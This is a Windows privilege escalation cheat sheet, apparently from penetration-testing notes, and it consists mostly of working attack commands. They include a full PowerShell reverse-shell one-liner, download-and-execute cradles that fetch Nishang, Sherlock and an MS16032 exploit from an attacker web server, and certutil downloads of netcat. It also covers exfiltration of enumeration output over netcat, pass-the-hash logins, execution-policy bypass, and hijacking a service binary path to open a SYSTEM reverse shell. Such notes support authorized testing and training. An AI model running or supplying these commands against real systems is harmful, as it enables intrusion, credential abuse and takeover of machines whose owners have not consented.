Powered by

# Windows Privesc

# System info

This can provide information on searching for exploits.

systeminfo
net config Workstation

NOTE: many times you can search the windows version "6.3.9600 N/A Build 9600 exploit" and get what you need.

# Viewing windows privledges 

whoami
whoami /priv
net user <username>
net users

This can expose interesting permissions such as

SeImpersonatePrivilege        Impersonate a client after authentication Enabled

search exploits for permissions in google to get more info.

# What is running? 

tasklist > tasklist.txt

Or alternatively:

wmic service list full > services.txt
wmic process > processes.txt

# What is on the machine? 

tree c:\ > c:\users\public\folders.txt     # list of dirs
dir /s c:\ > c:\users\public\files.txt     # list of files

# running winPEAS 

python3 -m http.server 80                                                               #run this on local machine
certutil.exe -urlcache -f http://10.10.10.10/nc.exe C:\Windows\Tasks\nc.exe
certutil.exe -urlcache -f http://10.10.10.10/winPEAS.bat C:\Windows\Tasks\winPEAS.bat
START /B winPEAS.bat > winPEAS.txt                                                      #runs winPEAS in the background
nc -lnvp 443 > winPEAS.txt                                                              #run this line on local machine
nc -vn 10.10.10.10 443 < winPEAS.txt

# Default writable directories 

C:\Windows\Temp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing

# evil-winrm 

evil-winrm -u <username> -H <Hash> -i <IP>                          # pass the hash
/opt/evil-winrm/evil-winrm.rb -u <username> -p <password> -i <IP>   # password

# Powershell Bypass Execution Policy 

powershell -ExecutionPolicy Bypass -File script.ps1

# Upgrade Shell with PowerShell Nishang

You may be on some janky webshell or netcat shell. here is

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation.

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1                                             

echo Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.10 -Port 443 >> Invoke-PowerShellTcp.ps1

python3 -m http.server 80

Open up a netcat listener on Kali:

nc -nlvp 443

Now Upgrade that Shell!

@"%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "IEX ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/Invoke-PowerShellTcp.ps1'))"

# Upgrade shell with a Powershell Oneliner

Make sure to modify IP and port

@"%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "&{$client = New-Object System.Net.Sockets.TCPClient(\"10.10.10.10\",443;$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"^> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}"

# Sherlock

Is the predecessor to watson and can still be used to find exploits on older windows systems.


wget https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1
IEX(New-Object Net.WebClient).downloadstring('http://10.10.10.10/Sherlock.ps1')

# Powershell exploit tricks

sometimes your powershell exploits fail.

[Environment]::Is64BitProcess                               #check to see if powershell is running as 64bit
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe  #64 bit powershell

# sometimes you'll have to add a line to the end of powershell exploits to get the to run.
# In this case we are telling the Invoke-MS16032  exploit to execute a revershell
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.10.10/shellsrev.ps1')"

# running exploit from your webserver
IEX(New-Object Net.WebClient).downloadstring('http://10.10.10.10/temp/Invoke-MS16032.ps1')

# Windows Services

changing the binary path for a windows service

sc config upnphost binpath= "C:\Inetpub\nc.exe -nv 10.10.10.10 443 -e C:\WINDOWS\System32\cmd.exe"
# Set obj and password
sc config upnphost obj= ".\LocalSystem" password= ""
# start service
net start upnphost

[//]: # https://github.com/frizb/Windows-Privilege-Escalation

© Copyright 2021. All rights reserved.